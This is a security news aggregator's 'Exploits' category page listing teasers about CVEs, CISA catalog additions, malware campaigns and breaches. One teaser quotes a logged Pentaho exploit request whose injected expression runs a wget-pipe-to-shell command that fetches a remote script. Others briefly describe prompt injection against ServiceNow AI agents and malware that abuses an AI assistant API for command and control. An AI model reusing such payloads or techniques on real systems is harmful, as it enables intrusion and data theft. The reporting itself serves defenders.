Geek-Guy.com

Category: Exploits

Explore the latest software exploits, zero-day vulnerabilities, and security PoCs. Geek-Guy provides expert analysis on emerging threats and how to stay protected.

Contagious Interview attackers go ‘full stack’ to fool developers

Researchers at Socket have uncovered more details of a sophisticated software supply-chain operation linked to the Contagious Interview campaign attacking developers who rely on packages from NPM. They report finding a “full stack” operation behind the attacks, where code hosting, package distribution, staging servers and command-and-control (C2) infrastructure are orchestrated much like a legitimate…

U.S. CISA adds an OpenPLC ScadaBR flaw to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds an OpenPLC ScadaBR flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an OpenPLC ScadaBR flaw, tracked as CVE-2021-26829 (CVSS score of 5.4), to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability is a cross-site scripting (XSS) flaw that impacts Windows and Linux versions via system_settings.shtm.…

Why security needs a step change to thwart cyber attacks amid surging innovation

As enterprise digitization accelerates to drive growth and meet customer expectations, it’s vital security leaders have the right tools and strategies to keep businesses secure. Take AI innovation for example. While its transformative impact is clear, security leaders must ensure these activities do not unwittingly widen “attack surfaces”. Beyond AI threats, issues such as unpatched…

SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 73

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Malware Newsletter: Analysis of ShadowPad Attack Exploiting WSUS Remote Code Execution Vulnerability (CVE-2025-59287); Shai-Hulud 2.0 Supply Chain Attack: 25K+ npm Repos Exposed; Spyware Allows Cyber Threat Actors to Target Users of Messaging Applications; Morphisec Thwarts Russian-Linked…

Security Affairs newsletter Round 552 by Pierluigi Paganini – INTERNATIONAL EDITION

A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Attackers stole member data from French Soccer Federation; Thousands of sensitive secrets published on JSONFormatter and…

CISA Adds Actively Exploited XSS Bug CVE-2021-26829 in OpenPLC ScadaBR to KEV

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has updated its Known Exploited Vulnerabilities (KEV) catalog to include a security flaw impacting OpenPLC ScadaBR, citing evidence of active exploitation. The vulnerability in question is CVE-2021-26829 (CVSS score: 5.4), a cross-site scripting (XSS) flaw that affects Windows and Linux versions of the software via

RomCom tries dropping a not-so-romantic payload on Ukraine-linked US firms

US firms with ties to projects supporting Ukraine are being targeted by the Russia-aligned RomCom group, which is using fake software updates to drop the Mythic Agent onto victim systems. In September 2025, Arctic Wolf Labs detected a campaign against a US engineering firm that had reportedly worked on such projects. The attack began as…

Thousands of sensitive secrets published on JSONFormatter and CodeBeautify

Users of JSONFormatter and CodeBeautify leaked thousands of sensitive secrets, including credentials and private keys, WatchTowr warns. WatchTowr’s latest research reveals massive leaks of passwords, secrets, and keys across developer formatting platforms like JSONFormatter and CodeBeautify. Despite past incidents, exposed credentials remain rampant, sometimes even for critical systems. WatchTowr researchers highlight how easily sensitive data…

New Mirai variant ShadowV2 tests IoT exploits amid AWS disruption

ShadowV2, a new Mirai-based botnet, briefly targeted vulnerable IoT devices during October’s AWS outage, likely as a test run. During the late-October AWS disruption, FortiGuard Labs researchers observed the Mirai-based ‘ShadowV2’ malware exploiting IoT vulnerabilities across multiple countries and industries. The botnet was active only during the outage, suggesting a test run for future attacks.…

New ToddyCat toolkit targets Outlook and Microsoft tokens

The APT group ToddyCat has shifted its focus to stealing Outlook email data and Microsoft 365 access tokens. Researchers at Kaspersky Labs have found that…

CSPM buyer’s guide: How to choose the best cloud security posture management tools

Cloud security posture management (CSPM) explained. Cloud security posture management (CSPM) combines threat intelligence, detection, and remediation that works across complex collections of cloud-based applications. After companies move to the cloud, many are under the impression that their cloud hosting providers are solely responsible for security, a misconception that can lead to data breaches and…

Forget Firewalls — Hack the Supplier: The Iberia Attack Blueprint Revealed

On 23 November 2025, Iberia disclosed a security incident stemming from an unauthorized access to the systems of a third-party supplier / vendor. The airline communicated to impacted customers that certain personal data may have been exposed. According to the notification, exposed information may include first and last name, email address, and loyalty-card identification numbers (Iberia…

For the first time, a RomCom payload has been observed being distributed via SocGholish

RomCom malware used the SocGholish fake update loader to deliver Mythic Agent to a U.S. civil engineering firm. In September 2025, Arctic Wolf Labs observed RomCom threat actors delivering the Mythic Agent via SocGholish to a U.S. company. The researchers noticed that the payload executed about 10 minutes after initial exploitation, marking the first time…

When your AI Assistant Becomes the Attacker’s Command-and-Control

Earlier this month, Microsoft uncovered SesameOp, a new backdoor malware that abuses the OpenAI Assistants API as a covert command-and-control (C2) channel. The discovery has drawn significant attention within the cybersecurity community. Security teams can no longer focus solely on endpoint malware. Attackers are weaponizing public and legitimate AI assistant APIs and defenders must adjust.…

‘Stranger Things’ emerge when OT security is stuck in the past

The final season of “Stranger Things” is upon us, and 1980s nostalgia is at an all-time high. The clunky control panels at Hawkins Lab help set the stage for the show. The unfortunate reality is that similar legacy systems still exist in operational technology (OT) environments today. Just as Hawkins Lab spawned a monstrous compendium…

Dissecting a new malspam chain delivering Purelogs infostealer

The AISI Research Center’s Cybersecurity Observatory publishes the report “Dissecting a new malspam chain delivering Purelogs infostealer” – November 25, 2025. Organizational and personal security remains under constant threat from increasingly sophisticated attack vectors, with malspam continuing to represent one of the most widespread and effective initial infection vectors for distributing malware on a large…

New ClickFix attacks use fake Windows Update screens to fool employees

CSOs and Windows admins should disable the ability of personal computers to automatically run commands to block the latest version of the ClickFix social engineering attacks. This advice comes from researchers at Huntress, who this week warned that a new version of ClickFix-based attacks, where employees are tricked into running malicious commands, is circulating. The…

Underground AI models promise to be hackers’ ‘cyber pentesting waifu’

As legitimate businesses purchase AI tools from some of the largest companies in the world, cybercriminals are accessing an increasingly sophisticated underground market for custom LLMs designed to assist with lower-level hacking tasks. In a report published Tuesday, Palo Alto Networks’ Unit 42 looked at how underground hacking forums advertise and sell custom, jailbroken, and…

CISA warns against unencrypted messaging

In an echo from this time last year, smartphone users are again being warned against sending unencrypted text messages by the US Cybersecurity and Infrastructure Security Agency (CISA). Warning in particular against nation-state attacks via messaging services aimed at high-value individuals, the latest updated CISA bulletin should be seen as a warning to us all. “Cyber threat actors are using…

Morphisec warns StealC V2 malware spread through weaponized blender files

StealC V2 spread via malicious Blender files on 3D model sites like CGTrader, abusing Blender’s ability to run hidden Python scripts. Cybersecurity firm Morphisec reported that Russian threat actors are spreading StealC V2 infostealer via weaponized Blender files uploaded to 3D model marketplaces like CGTrader. The malware abuses Blender’s ability to run Python scripts for automation…

CISA: Spyware and RATs used to target WhatsApp and Signal Users

CISA warns that threat actors are actively using commercial spyware and RATs to target users of mobile messaging apps WhatsApp and Signal. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of threat actors using commercial spyware and remote access trojans (RATs) to target users of popular instant messaging applications, including WhatsApp and Signal.…

Shai-Hulud worm returns stronger and more automated than ever before

Security researchers and authorities are warning about a fresh wave of supply-chain attacks linked to a self-replicating worm that attackers have injected into almost 500 npm (node.js package manager) software packages, exposing more than 26,000 open-source repositories on GitHub. The trojanized npm packages, which were first discovered late Sunday by Charlie Eriksen, security researcher at…

CISA alert draws attention to spyware’s targeting of messaging apps

The Cybersecurity and Infrastructure Security Agency warned Monday about threat groups using commercial spyware to target messaging apps, and urged users to take protective steps. “CISA is aware of multiple cyber threat actors actively leveraging commercial spyware to target users of mobile messaging applications (apps),” the agency said in a brief online notice. “These cyber…

Harvard reports vishing breach exposing alumni and donor contact data

Harvard revealed its Alumni Affairs systems suffered a vishing breach, exposing emails, phone numbers, addresses, donation data and biographical info. Harvard revealed that threat actors breached its Alumni Affairs and Development systems through a vishing attack, exposing contact, donation, and biographical data of students, staff, alumni. Harvard says the breached systems held no Social Security…

Apple at NeurIPS: Why it matters

Apple’s decision to take part in (and co-sponsor) this year’s NeurIPS conference shows how the company is keeping close tabs on future trends in the field, highlights its willingness to cooperate, and shows Apple reaching out to recruit new expertise. The company’s machine learning and artificial intelligence (AI) teams are deeply involved in the important event. Since…

Conflicts between URL mapping and URL-based access control, (Mon, Nov 24th)

We continue to encounter high-profile vulnerabilities that relate to how URL mapping (or “aliases”) interacts with URL-based access control. Last week, we wrote about the Oracle Identity Manager vulnerability. I noticed some scans for an older vulnerability with similar roots today: /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23%7BT(java.lang.Runtime).getRuntime().exec(‘wget%20-qO-%20http%3A%2F%2F[redacted]%2Frondo.pms.sh%7Csh’)%7D&mgrDn=a&pwd=a This request attempts to exploit a vulnerability in Hitachi Vantara…

Attackers deliver ShadowPad via newly patched WSUS RCE bug

Attackers exploited a patched WSUS flaw (CVE-2025-59287) to gain access, use PowerCat for a shell, and deploy the ShadowPad malware. AhnLab Security Intelligence Center (ASEC) researchers reported that threat actors exploited a recently patched WSUS flaw (CVE-2025-59287) to deliver the ShadowPad malware. ShadowPad is a backdoor widely used by China-linked APT groups and privately sold…

Oracle OIM zero‑day: Pre‑auth RCE forces rapid patching across enterprises

The Cybersecurity and Infrastructure Security Agency (CISA) has flagged a pre-authenticated, critical remote code execution flaw in Oracle Identity Manager (OIM), noting that it has been actively exploited, and added it to its Known Exploited Vulnerabilities (KEV) catalog. The flaw was first identified by Searchlight Cyber, which found it capable of allowing complete authentication bypass,…

When trust turns toxic: Lessons from the Salesloft Drift incident

The recent Salesloft Drift breach offered a sobering reminder of how easily trust can be weaponized in today’s SaaS and AI-integrated environments. In this incident, hackers exploited the Drift chatbot, stole OAuth tokens, and used them to obtain data from CRM systems before the tokens could be revoked. In the wake of the incident, many…

AI attack agents are accelerators, not autonomous weapons: the Anthropic attack

Why today’s AI attack agents boost human attackers but still fall far from becoming real autonomous weapons. Anthropic recently published a report that sparked a lively debate about what AI agents can actually do during a cyberattack. The study shows an AI system, trained specifically for offensive tasks, handling 80–90% of the tactical workload in…

ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access

A recently patched security flaw in Microsoft Windows Server Update Services (WSUS) has been exploited by threat actors to distribute malware known as ShadowPad. “The attacker targeted Windows Servers with WSUS enabled, exploiting CVE-2025-59287 for initial access,” AhnLab Security Intelligence Center (ASEC) said in a report published last week. “They then used PowerCat, an open-source

Security Affairs newsletter Round 551 by Pierluigi Paganini – INTERNATIONAL EDITION

A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. BadAudio malware: how APT24 scaled its cyberespionage through supply chain attacks U.S. CISA adds an Oracle…

SonicWall flags SSLVPN flaw allowing firewall crashes

SonicWall warns of a high-severity buffer overflow flaw in SonicOS SSLVPN (CVE-2025-40601) that lets attackers crash Gen7 and Gen8 firewalls. A new high-severity SonicOS SSLVPN flaw, tracked as CVE-2025-40601 (CVSS score of 7.5), allows attackers to crash SonicWall Gen7 and Gen8 firewalls. SonicWall is urging all customers to apply patches immediately, as the issue stems…

U.S. CISA adds an Oracle Fusion Middleware flaw to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds an Oracle Fusion Middleware flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Oracle Fusion Middleware flaw, tracked as CVE-2025-61757 (CVSS score of 9.8), to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability is a missing authentication for a critical function that…

CISA Warns of Actively Exploited Critical Oracle Identity Manager Zero-Day Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a critical security flaw impacting Oracle Identity Manager to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The vulnerability in question is CVE-2025-61757 (CVSS score: 9.8), a case of missing authentication for a critical function that can result in pre-authenticated

How to turn threat intel into real security wins

Security leaders aren’t short of data; they’re short of decisions. Here’s how to turn threat feeds into an operating model that measurably reduces loss, accelerates response and earns board confidence. The problem isn’t data, it’s conversion. Modern security operations centres ingest torrents of artefacts: Indicators of compromise, suspicious domains, sandbox reports, takedown notices and headlines…

SolarWinds addressed three critical flaws in Serv-U

SolarWinds patched three critical vulnerabilities in its Serv-U file transfer solution that could allow remote code execution. SolarWinds addressed three critical vulnerabilities in its Serv-U file transfer solution that could allow remote code execution. The first vulnerability, tracked as CVE-2025-40549 (CVSS score 9.1), is a path restriction bypass issue that impacts Serv-U. An attacker with…

OAuth token compromise hits Salesforce ecosystem again, Gainsight impacted

Salesforce has disclosed yet another security incident involving unauthorized access to customer data through compromised third-party applications, this time implicating Gainsight-published apps connected to its platform through OAuth integrations. Salesforce said it detected unusual activity involving Gainsight applications that integrate with its customer relationship management platform. “Upon detecting the activity, Salesforce revoked all active access…

Massive data leak hits Italian railway operator Ferrovie dello Stato via Almaviva hack

Ferrovie dello Stato Italiane (FS) data leaked after a breach at IT provider Almaviva. A hacker claims the theft of 2.3 TB of sensitive data. Data belonging to Italy’s national railway operator Ferrovie dello Stato Italiane (FS) was leaked after a data breach at IT provider Almaviva. FS Italiane Group is Italy’s state-owned railway company, managing passenger…

Ransomware gangs find a new hostage: Your AWS S3 buckets

Cybersecurity researchers have issued fresh warnings about ransomware operators shifting their focus from traditional on-premises targets to cloud storage services, especially S3 buckets used by Amazon Web Services (AWS). A recent Trend Micro report outlined a new wave of attacks, where attackers integrate with cloud-native encryption and key management services rather than merely stealing or…

Legacy web forms are the weakest link in government data security

Federal, state, and local government agencies face a critical vulnerability hiding in plain sight: outdated web forms collecting citizen data through insecure channels. While agencies invest in perimeter security and threat detection, many continue using legacy forms built years ago without modern encryption, authentication, or compliance capabilities. These aging systems collect Social Security numbers, financial…

Sneaky2FA phishing tool adds ability to insert legit-looking URLs

Since the introduction of multi-factor authentication (MFA), threat actors have been finding ways to get around what can be an effective defense against phishing attacks. In their latest move, those behind the Sneaky2FA phishing-as-a-service (PhaaS) kit have added browser-in-the-browser (BITB) functionality to help crooks design phishing pages that fool victims. This function allows the crook…

Fortinet criticized for ‘silent’ patching after disclosing second zero-day vulnerability in same equipment

Only days after Fortinet was criticized by researchers for ‘silently’ patching a zero-day vulnerability without informing its customers, it has emerged that it did the same for a second zero-day that is being used as part of the same attack chain. This is a story of two zero-day vulnerabilities in the FortiWeb web application firewall…

ShadowRay 2.0 Exploits Unpatched Ray Flaw to Build Self-Spreading GPU Cryptomining Botnet

Oligo Security has warned of ongoing attacks exploiting a two-year-old security flaw in the Ray open-source artificial intelligence (AI) framework to turn infected clusters with NVIDIA GPUs into a self-replicating cryptocurrency mining botnet. The activity, codenamed ShadowRay 2.0, is an evolution of a prior wave that was observed between September 2023 and March 2024. The…

Android Quick Share Support for AirDrop: A Secure Approach to Cross-Platform File Sharing

Posted by Dave Kleidermacher, VP, Platforms Security & Privacy, Google Technology should bring people closer together, not create walls. Being able to communicate and connect with friends and family should be easy regardless of the phone they use. That’s why Android has been building experiences that help you stay connected across platforms. As part of…

Oracle Identity Manager Exploit Observation from September (CVE-2025-61757), (Thu, Nov 20th)

Searchlight Cyber today released a blog detailing CVE-2025-61757, a vulnerability they reported to Oracle. Oracle released a patch for the vulnerability as part of its October Critical Patch Update, which was released on October 21st. Based on Searchlight Cyber’s blog, the issue is pretty trivial to exploit: All URLs that end in “.wadl” are exempt…

API exploit discovered for the Comet AI browser

Security researchers have disclosed an API exploit for the AI browser Comet. The security vendor SquareX has disclosed a previously undocumented API within the AI browser Comet. It allows arbitrary commands to be executed via embedded extensions and applications to be launched, capabilities that mainstream browsers deliberately block. The API can be accessed directly from perplexity.ai…

Cyber-enabled kinetic targeting: Iran-linked actor uses cyber operations to support physical attacks

Iran-linked actors mapped ship AIS data ahead of a missile strike attempt, highlighting the rise of cyber operations enabling real-world attacks. Iran-linked threat actors mapped ship Automatic Identification System (AIS) data shortly before an attempted missile strike, showing how Tehran-aligned groups use cyber operations to support and amplify real-world kinetic attacks. The research demonstrates that…

U.S. CISA adds a Google Chromium V8 flaw to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Google Chromium V8 flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Google Chromium V8 flaw, tracked as CVE-2025-13223, to its Known Exploited Vulnerabilities (KEV) catalog. This week, Google released Chrome security updates to address two flaws, including a high-severity V8 type confusion…

7-Zip RCE flaw (CVE-2025-11001) actively exploited in attacks in the wild

A remote code execution vulnerability, tracked as CVE-2025-11001, in the 7-Zip software is under active exploitation. A new 7-Zip flaw tracked as CVE-2025-11001 (CVSS score of 7.0) is now being actively exploited in the wild, NHS England warns. Remote attackers can trigger the vulnerability to execute arbitrary code on affected installations of 7-Zip. “Active exploitation…

Operation WrtHug hijacks 50,000+ ASUS routers to build a global botnet

Operation WrtHug hijacks tens of thousands of outdated ASUS routers worldwide, mainly in Taiwan, the U.S., and Russia, forming a large botnet. A new campaign called Operation WrtHug has compromised tens of thousands of outdated or end-of-life ASUS routers worldwide, mainly in Taiwan, the U.S., and Russia, pulling them into a large malicious network. SecurityScorecard…

Hackers Actively Exploiting 7-Zip Symbolic Link–Based RCE Vulnerability (CVE-2025-11001)

A recently disclosed security flaw impacting 7-Zip has come under active exploitation in the wild, according to an advisory issued by the U.K. NHS England Digital on Tuesday. The vulnerability in question is CVE-2025-11001 (CVSS score: 7.0), which allows remote attackers to execute arbitrary code. It has been addressed in 7-Zip version 25.00 released in…

The nexus of risk and intelligence: How vulnerability-informed hunting uncovers what everything else misses

For years, I watched organizations treat vulnerability data like a compliance chore. It was something to scan, sort and patch against deadlines. Yet buried in those reports is a treasure map of sorts, where an attacker is likely to strike first. In my previous red team and incident responder roles, minus a credential leak or…

Hidden API in Comet AI browser raises security red flags for enterprises

SquareX has disclosed a previously undocumented API within the Comet AI browser that allows its embedded extensions to execute arbitrary commands and launch applications — capabilities mainstream browsers intentionally block. According to a disclosure shared with CSO ahead of its publication on Wednesday, Comet’s Analytics Extension contains a custom MCP API that bypasses the decade-old…

U.S. CISA adds a new Fortinet FortiWeb flaw to its Known Exploited Vulnerabilities catalog

U.S. CISA has added a second Fortinet FortiWeb vulnerability in just a few days to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Fortinet FortiWeb flaw, tracked as CVE-2025-58034 (CVSS score of 6.7), to its Known Exploited Vulnerabilities (KEV) catalog. This week, Fortinet patched a new FortiWeb zero-day, tracked…

ServiceNow AI Agents Can Be Tricked Into Acting Against Each Other via Second-Order Prompts

Malicious actors can exploit default configurations in ServiceNow’s Now Assist generative artificial intelligence (AI) platform and leverage its agentic capabilities to conduct prompt injection attacks. The second-order prompt injection, according to AppOmni, makes use of Now Assist’s agent-to-agent discovery to execute unauthorized actions, enabling attackers to copy and exfiltrate sensitive

Popular Ghost blogging platform experiences hack attack [OLD NEWS]

Unknown hackers hacked the Ghost blogging platform. In May 2020, the popular blogging platform Ghost faced a security scare after unknown hackers infiltrated their systems. This incident, while resolved quickly, highlighted the ever-present threat of cyberattacks and the importance of robust security measures. Ghost in the Machine: The Breach Explained. The attack involved exploiting vulnerabilities…

LOLBin Attacks Explained with Examples: Everything SOC Teams Need to Know

Some attacks smash the door open. LOLBins just borrow your keys and walk right in. They’re tricky because tools everyone trusts suddenly start doing things that don’t match their usual job: loading odd-looking modules, decoding files that shouldn’t need decoding, or quietly handing work off to hidden PowerShell scripts. At first glance it all feels…

Eurofiber confirms November 13 hack, data theft, and extortion attempt

Eurofiber says hackers exploited a flaw on November 13, breached its ticket and customer portals, stole data, and attempted extortion. On November 13, threat actors exploited a vulnerability to breach the ticketing system and ATE customer portal of the European fiber operator Eurofiber. Attackers stole data and attempted extortion. Eurofiber focuses on B2B digital infrastructure,…

10 Online Security Tips for Seniors

This post will show you online security tips for seniors. The Internet offers seniors a treasure trove of information, connections, and opportunities. However, navigating the online world safely is crucial. As cybercrime continues to rise, older adults need to be security-conscious while exploring the vast digital landscape. Cybercriminals are constantly devising new methods to exploit…

New FortiWeb zero-day CVE-2025-58034 under attack patched by Fortinet

Fortinet patched a new FortiWeb zero-day, tracked as CVE-2025-58034, which attackers are actively exploiting. Fortinet patched a new FortiWeb zero-day, tracked as CVE-2025-58034 (CVSS score 6.7), which is being actively exploited in attacks in the wild. Trend Micro researcher Jason McFadyen reported the vulnerability. The flaw is an improper neutralization of special elements used in…

Hackers turn open-source AI framework into global cryptojacking operation

Malicious hackers have been attacking the development environment of an open-source AI framework, twisting its functions into a global cryptojacking bot for profit, according to researchers at cybersecurity firm Oligo. The flaw exists in an Application Programming Interface for Ray, an open-source framework for automating, scaling and optimizing compute resources that Oligo researchers called “Kubernetes…

Pennsylvania Office of the Attorney General (OAG) confirms data breach after August attack

The Pennsylvania Office of the Attorney General (“OAG”) confirms a data breach following a ransomware attack by Inc Ransom group. The Pennsylvania Office of the Attorney General (“OAG”) confirmed a data breach following a ransomware attack attributed to Inc Ransom group. However, the organization did not share details about the security breach, either the number…

More work for admins as Google patches latest zero-day Chrome vulnerability

For the third time in recent months, Google has found itself scrambling to fix a potentially serious zero-day flaw in the Chrome browser’s V8 JavaScript engine. Addressed on Monday as part of an emergency ‘out-of-band’ patch, the vulnerability identified as CVE-2025-13223 was discovered by Clément Lecigne of Google’s in-house Threat Analysis Group (TAG). At some…

Fortinet’s silent patch sparks alarm as a critical FortiWeb flaw is exploited in the wild

Security researchers are warning about two critical vulnerabilities in Fortinet’s FortiWeb appliances, now tracked under CVE-2025-64446, being actively exploited in the wild. According to findings published by watchTowr, one flaw allows unauthenticated actors to access internal CGI endpoints via relative path traversal, while the other authentication bypass issue lets them impersonate any administrator by abusing…

Google fixed the seventh Chrome zero-day in 2025

Google patched two Chrome flaws, including a V8 type-confusion bug, tracked as CVE-2025-13223, which was exploited in the wild. Google released Chrome security updates to address two flaws, including a high-severity V8 type confusion bug tracked as CVE-2025-13223 that has been actively exploited in the wild. The Chrome V8 engine is Google’s open-source JavaScript…

Google Issues Security Fix for Actively Exploited Chrome V8 Zero-Day Vulnerability

Google on Monday released security updates for its Chrome browser to address two security flaws, including one that has come under active exploitation in the wild. The vulnerability in question is CVE-2025-13223 (CVSS score: 8.8), a type confusion vulnerability in the V8 JavaScript and WebAssembly engine that could be exploited to achieve arbitrary code execution…